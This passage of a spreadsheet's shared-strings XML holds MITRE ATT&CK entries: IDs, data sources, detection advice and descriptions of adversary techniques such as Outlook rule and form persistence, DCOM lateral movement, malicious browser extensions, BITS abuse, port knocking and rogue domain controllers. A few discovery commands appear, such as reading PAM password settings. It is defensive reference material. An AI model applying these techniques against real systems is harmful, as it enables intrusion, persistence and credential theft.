    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>Mail server,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.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
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>Outlook Rules</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system.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
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)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
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</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</si>
  <si>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use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: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t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>Binary file metadata,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.</t>
  </si>
  <si>
    <t>**This technique has been deprecated and should no longer be used.**
As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD  (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different  (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</t>
  </si>
  <si>
    <t>Application whitelisting,Process whitelisting,Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.</t>
  </si>
  <si>
    <t>**This technique has been deprecated and should no longer be used.**
The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;.**This technique has been deprecated and should no longer be used.** /path/to/filename [arguments]&lt;/code&gt;. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment.(Citation: Source Manual)
Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</t>
  </si>
  <si>
    <t>Component Object Model and Distributed COM</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**
Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement. 
COM is a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Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>lateral-movement,execution</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.</t>
  </si>
  <si>
    <t>Adversaries may abuse Internet browser extensions to establish persistence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 (Citation: Wikipedia Browser Extension) (Citation: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 (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control  (Citation: Chrome Extension C2 Malware).</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Authentication logs,Packet capture,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>File monitoring,Network protocol analysis,Network device logs,Process use of network</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
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also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SMB/WebDAV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t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Windows,Linux,macOS,SaaS</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser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</si>
  <si>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Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.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attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: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t>
  </si>
  <si>
    <t>initial-access</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure,Network</t>
  </si>
  <si>
    <t>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</si>
  <si>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Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 
If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Web proxy,File monitoring</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Adversaries may manipulate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 (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>File monitoring,Web proxy</t>
  </si>
  <si>
    <t xml:space="preserve">Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)  
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. </t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  </t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Component firmware,BIOS,Disk forensics,EFI</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</t>
  </si>
  <si>
    <t>Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)  (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: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[PowerShell](https://attack.mitre.org/techniques/T1059/001)  (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>Firewall,Host forensic analysis</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure,SaaS</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Asset management,Data loss prevention</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</t>
  </si>
  <si>
    <t>Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110).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via various command shell utilities such as &lt;code&gt;net accounts (/domain)&lt;/code&gt;, &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;, and &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt;.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)</t>
  </si>
  <si>
    <t>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)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t>
  </si>
  <si>
    <t>Static File Analysis,Application control,Application control by file name or path</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Anti-virus,System calls,Process monitoring</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office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</si>
  <si>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Link](https://attack.mitre.org/techniques/T1566/002).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[Phishing](https://attack.mitre.org/techniques/T1566).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</si>
  <si>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User Execution</t>
  </si>
  <si>
    <t>Anti-virus,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</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</si>
  <si>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[Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204)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t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>Anti-virus,Process monitoring,Web proxy</t>
  </si>
  <si>
    <t>Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>Malicious File</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>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and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.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t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).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
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.</t>
  </si>
  <si>
    <t>defense-evasion,persistence,command-and-control</t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.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t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</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</si>
  <si>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(Citation: DCShadow Blog)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Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,File monitoring</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</si>
  <si>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</si>
  <si>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Scanning](https://attack.mitre.org/techniques/T1046)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 (Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. 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This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t>Adversaries may exploit a system or application vulnerability to bypass security features. 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t>
  </si>
  <si>
    <t>Anti-virus,System access controls</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Authentication logs,Windows Error Reporting,Process monitoring</t>
  </si>
  <si>
    <t>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Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</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</si>
  <si>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permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
